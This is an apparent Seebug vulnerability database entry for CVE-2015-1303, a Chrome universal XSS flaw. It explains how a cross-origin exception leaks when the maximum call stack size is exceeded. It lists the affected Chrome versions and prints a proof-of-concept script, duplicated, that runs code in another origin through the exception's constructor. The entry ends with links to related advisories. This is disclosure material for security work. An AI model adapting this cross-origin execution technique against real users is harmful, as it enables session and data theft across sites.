Lucene search
RootSSV:93032HistoryApr 24, 2017 - 12:00 a.m.
Chrome Universal XSS using stack overflow exceptions (CVE-2015-1303)
2017-04-2400:00:00
Root
www.seebug.org
12
0.013 Low
EPSS
Percentile
84.4%
VULNERABILITY DETAILS
When the maximum call stack size is exceeded, a RangeError object is created using isolate’s current context. Thus, if a cross-origin context had been entered (through the V8WrapperInstantiationScope constructor, for example), a cross-origin exception will be propagated to the catch handler.
VERSION
Chrome 45.0.2454.85 (Stable)
Chrome 46.0.2490.22 (Beta)
Chrome 47.0.2503.0 (Dev)
Chromium 47.0.2507.0 (Release build compiled today)
REPRODUCTION CASE
<script>
var i = document.documentElement.appendChild(document.createElement('iframe'));
function g() {
var w = frames[0];
function f() {
try { f(); } catch(e) {}
try { w.location; } catch(e) { o = e; }
}
f();
o.constructor.constructor('alert(location)')();
}
function c() {
try { frames[0].a; } catch(e) {
clearInterval(s);
g();
}
}
var s = setInterval(c, 1);
i.src = 'https://abc.xyz';
</script>
<script>
var i = document.documentElement.appendChild(document.createElement('iframe'));
function g() {
var w = frames[0];
function f() {
try { f(); } catch(e) {}
try { w.location; } catch(e) { o = e; }
}
f();
o.constructor.constructor('alert(location)')();
}
function c() {
try { frames[0].a; } catch(e) {
clearInterval(s);
g();
}
}
var s = setInterval(c, 1);
i.src = 'https://abc.xyz';
</script>
Related
cve
cve
CVE-2015-1303
2015-10-12 01:59:00
debiancve
debiancve
CVE-2015-1303
2015-10-12 01:59:00
ubuntucve
ubuntucve
CVE-2015-1303
2015-09-29 00:00:00
prion
prion
Design/Logic Flaw
2015-10-12 01:59:00
nessus
nessus
Ubuntu 14.04 LTS : Oxide vulnerabilities (USN-2757-1)
2015-10-06 00:00:00
Google Chrome < 45.0.2454.101 Multiple Vulnerabilities
2015-12-04 00:00:00
openSUSE Security Update : Chromium (openSUSE-2015-649)
2015-10-12 00:00:00
suse
suse
Security update for Chromium (important)
2015-11-02 16:35:34
Security update for Chromium (important)
2015-10-11 14:09:40
openvas
openvas
Mageia: Security Advisory (MGASA-2015-0389)
2015-10-15 00:00:00
Google Chrome Multiple Vulnerabilities-02 (Oct 2015) - Linux
2015-10-19 00:00:00
Google Chrome Multiple Vulnerabilities-02 (Oct 2015) - Mac OS X
2015-10-19 00:00:00
securityvulns
securityvulns
[USN-2757-1] Oxide vulnerabilities
2015-10-11 00:00:00
Oxide security vulnerabilities
2015-10-11 00:00:00
Google Chrome / Chromium / Oxide multiple security vulnerabilities
2015-10-25 00:00:00
chrome
chrome
Stable Channel Update
2015-09-24 00:00:00
redhat
redhat
(RHSA-2015:1841) Important: chromium-browser security update
2015-09-29 00:00:00
kaspersky
kaspersky
KLA10673 Security bypass vulnerabilties at Google Chrome
2015-09-24 00:00:00
mageia
mageia
Updated chromium-browser packages fix security vulnerabilities
2015-10-04 00:15:27
freebsd
freebsd
chromium -- multiple vulnerabilities
2015-09-24 00:00:00
ubuntu
ubuntu
Oxide vulnerabilities
2015-10-05 00:00:00
archlinux
archlinux
chromium: cross-origin bypass
2015-09-28 00:00:00
osv
osv
chromium-browser - security update
2015-10-20 00:00:00
debian
debian
[SECURITY] [DSA 3376-1] chromium-browser security update
2015-10-21 03:08:24
[SECURITY] [DSA 3376-1] chromium-browser security update
2015-10-21 03:08:24
gentoo
gentoo
Chromium: Multiple vulnerabilities
2016-03-12 00:00:00